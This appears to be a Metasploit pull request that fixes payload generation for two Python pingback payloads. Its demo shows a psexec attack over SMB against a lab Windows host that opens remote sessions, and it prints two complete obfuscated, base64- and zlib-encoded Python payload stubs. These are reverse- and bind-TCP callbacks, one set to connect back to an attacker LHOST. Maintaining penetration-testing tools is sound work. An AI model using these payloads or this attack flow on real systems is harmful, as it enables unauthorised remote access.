### PR TITLE
Add a missing include so the payloads generate

### DIFF
--- a/modules/payloads/singles/python/pingback_bind_tcp.rb
+++ b/modules/payloads/singles/python/pingback_bind_tcp.rb
@@ -4,6 +4,7 @@ module MetasploitModule
   CachedSize = :dynamic
 
   include Msf::Payload::Single
+  include Msf::Payload::Python
   include Msf::Payload::Pingback
   include Msf::Payload::Pingback::Options
 

--- a/modules/payloads/singles/python/pingback_reverse_tcp.rb
+++ b/modules/payloads/singles/python/pingback_reverse_tcp.rb
@@ -4,6 +4,7 @@ module MetasploitModule
   CachedSize = :dynamic
 
   include Msf::Payload::Single
+  include Msf::Payload::Python
   include Msf::Payload::Pingback
   include Msf::Payload::Pingback::Options
 


### PR DESCRIPTION
Fixes #17765 by adding the necessary includes to make the `#py_create_exec_stub` method available to the payloads.

## Verification

- [ ] Start `msfconsole`
- [ ] `use payload/python/pingback_reverse_tcp` (set LHOST)
    - [ ] generate it and see no errors
- [ ] `use payload/python/pingback_bind_tcp`
    - [ ] generate it and see no errors

## Demo
```
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[*] Incoming UUID = 772d62245cdc4ae78d99732f37e1fe95
[+] UUID identified (772d62245cdc4ae78d99732f37e1fe95)
[*] Pingback session 1 opened (192.168.159.128:4444 -> 192.168.159.10:49862) at 2023-03-21 16:47:57 -0400
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.159.10:445 - Getting the command output...
[*] 192.168.159.10:445 - Command finished with no output
[*] 192.168.159.10:445 - Executing cleanup...
[+] 192.168.159.10:445 - Cleanup was successful


[*] 192.168.159.10 - Pingback session 1 closed.  Reason: User exit
msf6 exploit(windows/smb/psexec) > set PAYLOAD cmd/windows/python/pingback_bind_tcp 
PAYLOAD => cmd/windows/python/pingback_bind_tcp
msf6 exploit(windows/smb/psexec) > run

[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[-] 192.168.159.10:445 - Unable to get handle: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION
[-] 192.168.159.10:445 - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 192.168.159.10:445 - Getting the command output...
[-] 192.168.159.10:445 - Unable to read file \Windows\Temp\SunjnfOXbAqscd.txt. RubySMB::Error::UnexpectedStatusCode: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION.
[-] 192.168.159.10:445 - Error getting command output
[*] 192.168.159.10:445 - Executing cleanup...
[+] 192.168.159.10:445 - Cleanup was successful
[*] Started bind TCP handler against 192.168.159.10:4444
[*] Incoming UUID = 59ead90391c749588be2ec55e2615bda
[+] UUID identified (59ead90391c749588be2ec55e2615bda)
[*] Pingback session 2 opened (127.0.0.1 -> 192.168.159.10:4444) at 2023-03-21 16:48:19 -0400


[*] 192.168.159.10 - Pingback session 2 closed.  Reason: User exit
msf6 exploit(windows/smb/psexec) > use payload/python/pingback_bind_tcp 
msf6 payload(python/pingback_bind_tcp) > generate -f raw
exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNoljkurwjAQhff5Fdk1hRJ8ISh0UbWi+Kg2yuW6CUkaNL5SOlnovzdpZ1Zn5jtnxrxq2zgszVuAMgYLwBKZbghWPbQLI0A2BdppAjRb8vU+PyVAWTHfcHYq82wXI9d8pwhbCtoF1NaBZcWWB8rjOChe5meWZ4tFmeB+HHB/uyIk6tG2owSPfMXt6mnA6TdpuURUVZNaKpTSPjnuLnmrpGIguRSgxyMSnevvfbi//x1V0Zsc/mcXtlrermkadYnqaUF7s/6EFP9uLQDQD07fT6Y=')[0])))
msf6 payload(python/pingback_bind_tcp) > use payload/python/pingback_reverse_tcp 
msf6 payload(python/pingback_reverse_tcp) > generate -f raw
[-] Payload generation failed: One or more options failed to validate: LHOST.
msf6 payload(python/pingback_reverse_tcp) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 payload(python/pingback_reverse_tcp) > generate -f raw
exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNoljV0LgjAYhe/3K7xzAxlMTDTwwkSp7ANSCLqRbY4a1Sa+g+rfp3juzsNzOPo92NF5QhsOUmuPgyeQXiBY+VRuRoBsBnTpGGhedbtT2QZAm3NRd017KfMjQW78rZFnqbTGKOkw9lkaUhYnlK1SysLED6IphMwSKNNjQXkoOsFBxRH2i0Pe9rdN1fZxVSbbR83u++sny/xlIV8WFCZIfaUa3PQ0cAD0BwbYOgg=')[0])))
msf6 payload(python/pingback_reverse_tcp) >
```